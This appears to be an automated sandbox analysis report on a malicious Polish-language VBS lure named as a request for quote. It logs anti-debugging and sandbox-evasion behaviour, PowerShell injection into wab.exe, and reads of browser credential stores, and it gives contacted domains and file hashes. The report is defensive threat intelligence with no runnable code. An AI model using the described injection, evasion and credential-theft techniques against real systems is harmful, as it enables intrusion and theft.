Source: C:\Users\user\AppData\Roaming\fMNDB\fMNDB.exe	Registry key monitored for changes: HKEY_CURRENT_USER_Classes			Jump to behavior

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Memory allocated: 3230000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Memory allocated: 22FC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Memory allocated: 22CB0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6605	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3197	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7085	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2686	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Window / User API: threadDelayed 1874	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Window / User API: threadDelayed 2529	Jump to behavior

Source: C:\Windows\System32\wscript.exe TID: 6956	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6616	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2696	Thread sleep count: 7085 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6016	Thread sleep count: 2686 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7048	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7140	Thread sleep time: -13835058055282155s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7140	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 360	Thread sleep count: 1874 > 30	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7140	Thread sleep time: -99886s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 360	Thread sleep count: 2529 > 30	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7140	Thread sleep time: -99753s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7140	Thread sleep time: -99608s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7140	Thread sleep time: -99499s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7140	Thread sleep time: -99168s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7140	Thread sleep time: -98983s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7140	Thread sleep time: -98636s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7140	Thread sleep time: -98511s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7140	Thread sleep time: -98405s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7140	Thread sleep time: -98295s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7140	Thread sleep time: -98184s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7140	Thread sleep time: -98078s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7140	Thread sleep time: -97968s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7140	Thread sleep time: -97860s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7140	Thread sleep time: -97735s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7140	Thread sleep time: -97610s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7140	Thread sleep time: -97485s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7140	Thread sleep time: -97360s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7140	Thread sleep time: -97235s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7140	Thread sleep time: -97110s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7140	Thread sleep time: -96985s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7140	Thread sleep time: -96860s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7140	Thread sleep time: -96735s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7140	Thread sleep time: -96610s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7140	Thread sleep time: -96469s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7140	Thread sleep time: -96317s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7140	Thread sleep time: -95997s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7140	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: wscript.exe, 00000000.00000003.1277612998.0000029F535EA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1278770323.0000029F535EA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1279999065.0000029F535EA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1276189657.0000029F535EA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWp(
Source: wscript.exe, 00000000.00000003.1277612998.0000029F535EA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1278770323.0000029F535EA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1279999065.0000029F535EA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1276189657.0000029F535EA000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000016.00000002.3747116656.0000000007268000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000016.00000002.3747116656.00000000072BF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000010.00000002.3188900570.0000016B70966000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllsN
Source: wscript.exe, 00000000.00000003.1279668340.0000029F516BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1277852419.0000029F516BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1277429753.0000029F516BB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW`

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread information set: HideFromDebugger			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\AppData\Roaming\fMNDB\fMNDB.exe	Code function: 24_2_00163450 SetUnhandledExceptionFilter,		24_2_00163450
Source: C:\Users\user\AppData\Roaming\fMNDB\fMNDB.exe	Code function: 24_2_001632C0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		24_2_001632C0

Source: Yara match	File source: amsi64_4704.amsi.csv, type: OTHER
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 4704, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7004, type: MEMORYSTR

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 44D0000			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 323F8A0			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Queries volume information: C:\Program Files (x86)\Windows Mail\wab.exe VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: Yara match	File source: 00000016.00000002.3758847608.000000002303A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.3758847608.000000002300F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.3758847608.0000000022FC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: wab.exe PID: 3736, type: MEMORYSTR

Windows Analysis Report Zapytanie ofertowe (GASTRON 07022024).vbs

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Windows Analysis Report
Zapytanie ofertowe (GASTRON 07022024).vbs

Malware Threat Intel
Provided by

Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior

IP	Domain	Country	ASN	ASN Name	Malicious
142.250.185.174	drive.google.com	United States	15169	GOOGLEUS	false
142.250.74.193	drive.usercontent.google.com	United States	15169	GOOGLEUS	false
195.128.154.10	fiszebrandt.pl	Poland	201814	PL-SKYTECH-ASPL	true

ID:	1466650
Product:	CloudBasic
Start time:	08:42:45
Start date:	03.07.2024
Sample:	Zapytanie ofertowe (GASTRON 07022024).vbs
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	d1d5fd7033560a49ca0f5c010a8fded5
SHA1:	d1dba8603565c80a3d7f14fe1f61a2829f56d2c9
SHA256:	e472ffd396f4c7e6b48c073ab67d8682e7ef5cd11ca9c41fbc9a447a6314d79f
Filetype:	Visual Basic Script (13500/0) 100.00%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506	Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression	49AEBF8CBD62D92AC215B2923FB1B9F5	1723BE06719828DDA65AD804298D0431F6AFF976	B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506	data	BB89FCCE029C0095CEA80460163F97C5	CD08016243779BB92EB0D2B7ECC3E9409DBE8043	6C638C5C2BC2B7025CC313022D2678D39394EA032ADCFCEE140C8F178A9CA920
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache	data	DD89E182EEC1B964E2EEFE5F8889DCD7	326A3754A1334C32056811411E0C5C96F8BFBBEE	383ABA2B62EA69A1AA28F0522BCFB0A19F82B15FCC047105B952950FF8B52C63
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	data	F23953D4A58E404FCB67ADD0C45EB27A	2D75B5CACF2916C66E440F19F6B3B21DFD289340	16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0svqftf5.b3a.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_affrgltk.dn1.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c1zfskfq.mda.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_e1edl1gs.ljq.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Roaming\Veinless.Dis	ASCII text, with very long lines (65536), with no line terminators	92F84DC8F8ADB10010AA47F3B9F68448	631BEB18C66F4935D55CA78237F6CAF1FF578CE7	5299FC6C941166C1887B927118773FC37D25DEAE8273FFBA2BBCB0490AC746E4
C:\Users\user\AppData\Roaming\fMNDB\fMNDB.exe	PE32 executable (GUI) Intel 80386, for MS Windows	251E51E2FEDCE8BB82763D39D631EF89	677A3566789D4DA5459A1ECD01A297C261A133A2	2682086ACE1970D5573F971669591B731F87D749406927BD7A7A4B58C3C662E9